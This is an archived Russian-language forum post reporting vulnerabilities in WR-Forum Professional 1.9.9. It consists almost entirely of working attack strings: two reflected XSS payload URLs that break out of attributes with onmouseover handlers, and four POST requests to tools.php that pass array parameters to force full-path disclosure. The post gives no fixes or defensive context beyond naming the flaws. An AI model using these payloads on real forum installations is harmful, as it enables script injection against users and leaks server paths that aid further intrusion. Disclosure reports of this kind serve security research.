Уязвимости в WR-Forum Professional 1.9.9 [Архив]

strelok20094

28.06.2015, 18:11

Представляю отчёт об уязвимостях, найденных мною в WR-Forum Professional 1.9.9 (http://www.wr-script.ru/forum/index.php?id=1021275)

.1.Пассивная XSS

http://site.com/talk/pm.php?readpm&id=usver' onmouseover=prompt(/XSS/) bad= (http://site.com/talk/pm.php?readpm&id=usver'%20onmouseover%3dprompt(/XSS/)%20bad%3d)'

http://site.com/talk/index.php/'onmouseover='prompt(/XSS/)'bad= (http://site.com/talk/index.php/'onmouseover%3d'prompt(/XSS/)'bad%3d)'

http://i.imgur.com/2Rj3Nir.png

.2.Раскрытие путей

.2.1http://site.com/talk/tools.php?event=reg2

POSTDATA

email[]=sample@email.tst (mailto:sample@email.tst)&name[]=Myl33tNickName&pass=Myl33tPWD&pol=bla bla bla&stime=Myl33tNum&usernum[]=Myl33tNum&xkey=Myl33tNum

.2.2http://site.com/talk/tools.php?find&event=go

POSTDATA

findme[]=the&ftype=0&gdefinder=1&withregistr=on

.2.3http://site.com/talk/tools.php?event=givmepassword

POSTDATA

myemail[]=sample%40email.tst&myname[]=Myl33tNickName

.2.4http://site.com/talk/tools.php?event=regenter

POSTDATA

name[]=Myl33tNickName&pass[]=Myl33tPWD

Как-то так. Возможно в тему будет что нибудь добавляться.